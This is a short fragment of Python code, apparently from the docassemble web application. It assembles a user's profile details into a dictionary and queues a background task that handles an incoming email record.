        user_info = dict(email=user.email, roles=[role.name for role in user.roles],
                         the_user_id=user.id, theid=user.id, firstname=user.first_name,
                         lastname=user.last_name, nickname=user.nickname, country=user.country,
                         subdivisionfirst=user.subdivisionfirst,
                         subdivisionsecond=user.subdivisionsecond,
                         subdivisionthird=user.subdivisionthird, organization=user.organization)
    result = docassemble.webapp.worker.background_action.delay(
        record.filename, user_info, record.uid, None, 'http://localhost', 'http://localhost',
        dict(action='incoming_email', arguments=dict(id=email_record.id)), extra=None)